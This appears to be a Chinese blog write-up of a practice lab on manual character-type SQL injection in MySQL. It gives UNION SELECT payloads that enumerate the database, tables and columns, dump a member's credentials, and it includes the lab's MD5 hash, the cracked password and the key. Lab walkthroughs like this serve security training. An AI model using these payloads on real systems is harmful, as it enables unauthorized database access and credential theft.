SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录

一进来看到一个停机公告,点开查看

发现链接中有字符参数,怀疑存在字符型注入

输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1

' and '1'='2

发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。

通过order by 子句判断字段数

order by 1

order by 2

order by 5

order by 4

当order by 4 时网页正常响应,by 5时发生错误,说明存在4个字段。

判断回显位置。

通过union select 判断回显位置。

id=1' union select 1,2,3,4--+

回显位置为 2 和 3

爆当前数据库 id=1' union select 1,2,database(),4--+

得到数据库是 mozhe_discuz_stormgroup

爆表名 id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database()--+

得到数据表为 notice,stormgroup_member

爆列名 id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema like database() and table_name like 'stormgroup_member'--+

得到列名为 id,name,password,status

爆内容

爆出name,password,status的内容

id=1' union select 1,2,group_concat(name,',',password,',',status),4 from stormgroup_member--+

得到 name 为 mozhe , password 为 e804b0037bec0607a82e7be037e2e51d

password是个md5值,在md5在线解密网站上解密

密码为 196397

利用得到的账号密码登录

得到key mozhec2b968ab2172fe26c724b10d8b2

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chick&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值